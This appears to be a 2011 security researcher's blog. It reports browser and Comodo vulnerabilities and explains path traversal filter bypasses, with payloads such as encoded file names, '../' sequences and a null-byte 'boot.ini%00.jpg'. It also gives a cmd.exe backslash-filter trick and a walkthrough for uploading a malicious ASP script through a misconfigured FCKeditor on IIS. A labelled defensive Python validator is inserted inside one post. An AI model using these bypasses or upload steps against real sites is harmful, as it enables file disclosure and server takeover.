Fascinated by computer

Pouya Daneshmand's Blog / پويا دانشمند / Computer Researches

Opera Address bar Spoofing vulnerability is not patched yet!?

Last year I reported a vulnerability in the Opera browser which allows users to be deceived and lets an attacker show a fake website address to their victims.


PoC:


Today I accidentally found that the vulnerability is still there! The Opera development team has not fixed it yet! Is it really so trivial that they don't even try to fix it?!

What do you think?

By: Pouya | 2011/10/13 - 01:00:41 | Category: Security | Comments (18)

Security is important for Comodo

Recently I heard on the Internet about the hacking of Comodo by Iranian hackers.
Three weeks ago I submitted a significant number of vulnerabilities (including XSS, CRLF, full path disclosure and information leaks) to Comodo, and it has been over a week and they have not fixed any of them.

I didn't send the vulnerabilities to get credit or anything from them, but only to show the real face of Iran and the Iranian people.

In my belief, it is a mistake to steal digital certificates and use them against people, as making Stuxnet was.
If any person or government believes in freedom of expression and information, then violating people's privacy is meaningless. I expect to have safe and private web surfing, as every user in America, Italy, Brazil, or Egypt should have.
People around the world have a lot in common, so don't try to set them against each other.

Although Comodo is a victim of this attack, they still neglect these problems. This is not a good point for a company like Comodo, and I'm sure these bugs will be fixed in the next few days.
Remember, although an XSS vulnerability does not give the attacker direct access to the server,
it can be one of the main pillars of an attack.

Hoping for a safe Internet.
----------------------------------
Update 2011-12-02  
Comodo fixed many of the bugs.

By: Pouya | 2011/05/07 - 12:29:25 | Category: General | Comments (2)

Path Traversal - Bypass Methods

Path traversal vulnerabilities are very common in web application programming.

Bypass Methods:
1. Encoding Data
For example, encode the name of your file with a common encoding method:
download.php?getfile=Y29uZmlnLnBocA==
In the above example the file name (config.php) is base64 encoded.

2. Encrypting Data
In this method you must use encrypting algorithms:
download.php?getfile=%63%6F%6E%66%69%67%2E%70%68%70%0A%09%09%09
In the above example the file name (config.php) is percent-encoded, followed by a newline and three tab characters.

3. Special Characters
In some web apps it is possible to use special characters (like ~/ and ../) in file names. An attacker can use them to change the current directory to another one.
Example: download.php?getfile=~/../boot

4. File Extensions
Some web apps validate the file's extension before allowing it to be downloaded. An attacker can bypass this using a null byte, for example: "./../../../boot.ini%00.jpg"
Web apps which pass the name to an OS API have this vulnerability because the OS and the web server interpret null bytes differently: in this example, the real file name is cut down by the system API to "./../../../boot.ini". %20 may also be used (e.g. ../../../index.asp%20).

5. Using the HTTP Referer Header
In this method the attacker directly edits the HTTP Referer value. Most web servers do not validate these types of variables correctly and trust them by default.
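The defensive counterpart to methods 1 to 4 above, as an added example that is not part of the original post: a download handler that decodes the parameter the way the application would, rejects control bytes and boundary whitespace, checks the extension on the decoded name, and confines the canonical path to the download root. The download root, the allowed extensions and the base64 option are assumptions for the example; the test inputs are the post's own payloads.

```python
import base64
import os
from typing import Optional
from urllib.parse import unquote

# Constructed download root for the example; it need not exist for the checks.
BASE_DIR = os.path.realpath("/srv/www/downloads")
ALLOWED_EXT = {".jpg", ".pdf", ".txt"}


def naive_is_allowed(getfile: str) -> bool:
    """The weak check from method 4: look only at the last extension of the
    decoded name. A NUL byte before '.jpg' passes here, but the OS API that
    opens the file stops at the NUL and serves 'boot.ini' instead."""
    name = unquote(getfile)
    return os.path.splitext(name)[1].lower() in ALLOWED_EXT


def resolve_download(getfile: str, accept_base64: bool = False,
                     base_dir: str = BASE_DIR) -> Optional[str]:
    """Hardened resolution: undo every decoding the app performs, reject
    control and boundary whitespace characters, check the extension on the
    final name, then confine the canonical path to base_dir. Returns the
    path to serve, or None when the request must be rejected."""
    name = unquote(getfile)                      # method 2: validate decoded data
    if accept_base64:                            # method 1 (assumed app feature)
        try:
            name = base64.b64decode(name, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            return None
    if not name or name != name.strip():         # method 4: trailing %20 and friends
        return None
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in name):
        return None                              # methods 2 and 4: NUL, \n, \t ...
    if os.path.splitext(name)[1].lower() not in ALLOWED_EXT:
        return None                              # extension of the *decoded* name
    candidate = os.path.realpath(os.path.join(base_dir, name))
    if os.path.commonpath([base_dir, candidate]) != base_dir:
        return None                              # method 3: ../ or ~/ left base_dir
    return candidate
```

The point of the pairing is that every bypass in the post defeats a check on the raw parameter, while none of them survives a check on the fully decoded, canonicalised path.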

Download Full Article

By: Pouya | 2011/05/06 - 23:30:08 | Category: Articles | Comments (1)

Slash is filtered, bypass method

Sometimes there are restrictions on certain inputs; such a restriction can be enforced by special software.
Suppose the user is not allowed to use the '\' character. You can use "%tmp:~2,1%" to bypass the restriction (cmd.exe expands this to the third character of the %tmp% variable, which is normally the backslash after the drive letter), as shown in the image below:

By: Pouya | 2011/05/05 - 22:21:59 | Category: Security | Comments (0)

IIS parsing directory dangerous or not?

Some people asked me, "Is the parsing vulnerability really dangerous?"

This is an example of what an attacker can do using this vulnerability:
Find a website which uses FCKeditor that is not configured properly.
Now upload a malicious file in your own way; for example, the most common way is to rename your file to 'test.asp;test.jpg' and then try to upload it. You will see that the dot character (.) in the file name is renamed to an underscore (_). (See figures 1, 2 and 3.)

[Figures 1-3]

Now let's create a folder with a .asa extension; as you see in figure 4, the folder is created.
So we can upload our malicious ASP script with a .jpg extension into the folder, and finally open it in the browser. (Figures 5 and 6.)

[Figures 4-6]

You can find new ideas.

By: Pouya | 2011/04/25 - 10:54:25 | Category: Security | Comments (0)
